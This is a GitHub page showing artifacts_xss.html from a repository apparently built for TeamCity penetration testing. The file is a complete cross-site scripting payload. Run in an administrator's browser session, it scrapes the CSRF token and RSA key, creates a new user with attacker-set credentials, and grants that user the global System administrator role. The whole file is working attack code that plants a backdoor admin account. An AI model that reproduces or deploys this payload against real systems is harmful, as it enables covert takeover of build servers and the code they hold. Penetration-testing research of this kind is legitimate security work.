forked from kacperszurek/pentest_teamcity
-
Notifications
You must be signed in to change notification settings - Fork 0
/
artifacts_xss.html
49 lines (42 loc) · 2.17 KB
/
artifacts_xss.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<script>
username = "my_new_username";
email = "user@email.email"
password = "my_new_password"
var BS = {};
</script>
<script type="text/javascript" src="/js/crypt/jsbn.js"></script>
<script type="text/javascript" src="/js/crypt/prng4.js"></script>
<script type="text/javascript" src="/js/crypt/rng.js"></script>
<script type="text/javascript" src="/js/crypt/rsa.js"></script>
<script>
function encryptData(data, publicKey) {
BS.Crypto.rng_seed_time();
var rsa = new BS.Crypto.RSAKey();
rsa.setPublic(publicKey, "10001");
return rsa.encrypt(data);
}
function get_regexp(regexp, data) {
var match = regexp.exec(data);
return match[1];
}
var createUser = new XMLHttpRequest();
createUser.open("GET", "/admin/createUser.html", false);
createUser.send();
var csrftoken = get_regexp(/tc-csrf-token" value="([^"]*?)"/g, createUser.responseText);
var publickey = get_regexp(/name="publicKey" value="([^"]*?)"/g, createUser.responseText);
var encrypted_password = encryptData(password, publickey);
var params = "_administrator=true&administrator=true&username1="+escape(username)+"&name="+escape(username)+"&email="+escape(email)+"&publicKey="+escape(publickey)+"&_createMoreUsers=&submitCreateUser=Create+User&tc-csrf-token="+escape(csrftoken)+"&encryptedPassword1="+escape(encrypted_password)+"&encryptedRetypedPassword="+escape(encrypted_password);
var createUserPost = new XMLHttpRequest();
createUserPost.open("POST", "/admin/createUserSubmit.html", false);
createUserPost.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
createUserPost.send(params);
var listUsers = new XMLHttpRequest();
listUsers.open("GET", "/admin/admin.html?item=users", false);
listUsers.send();
var userid = get_regexp(new RegExp('admin\/editUser.html.*?userId=([0-9]+)[^"]*">'+username+'<', "g"), listUsers.responseText);
var params = "-ufd-teamcity-ui-role=System+administrator&role=SYSTEM_ADMIN&roleScope=global&_replaceRoles=&assignRoles=Assign&tc-csrf-token="+escape(csrftoken)+"&rolesHolderId="+escape(userid)
var addRole = new XMLHttpRequest();
addRole.open("POST", "/admin/action.html", false);
addRole.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
addRole.send(params);
</script>